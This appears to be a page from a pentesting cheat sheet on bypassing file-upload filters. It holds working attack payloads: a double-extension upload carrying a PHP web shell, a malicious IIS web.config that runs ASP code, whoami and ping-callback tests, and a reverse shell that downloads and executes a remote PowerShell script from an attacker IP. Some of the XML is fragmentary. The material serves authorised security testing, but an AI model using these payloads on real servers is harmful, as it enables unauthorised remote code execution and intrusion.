Business Logic Testing

File Upload


Bypassing Filters

Enumerate Allowed Extensions:

Truncating File-Name

Append Allowed Extension

  • file.php.png


  • Check allowed file size

  • Check allowed extensions

  • Check Content-Type Header

Content-Disposition: form-data; name="myFile"; filename="test.php.png"

Content-Type: image/png


<?php system($_GET['cmd']); ?>

IIS Web Servers

A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.

  • Upload ASP code within a web.config file.

  • Ensure each line of the ASP payload code is on a new line.

#Save as Web.config
<?xml version="1.0" encoding="UTF-8"?>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
               <remove fileExtension=".config" />
               <remove segment="web.config" />
<!-- Insert ASPX Code Here -->
#Payload to test for code execution. This will output sum(1+2)

#Test for whoami
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()

#Payload to test for ping callback
Set rs = CreateObject("WScript.Shell") 
Set cmd = rs.Exec("cmd /c ping") 
o = cmd.StdOut.Readall() 

tcpdump -i tun0 icmp

#Reverse shell
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('<IP>/shell.ps1')")
o = cmd.StdOut.Readall()

Last updated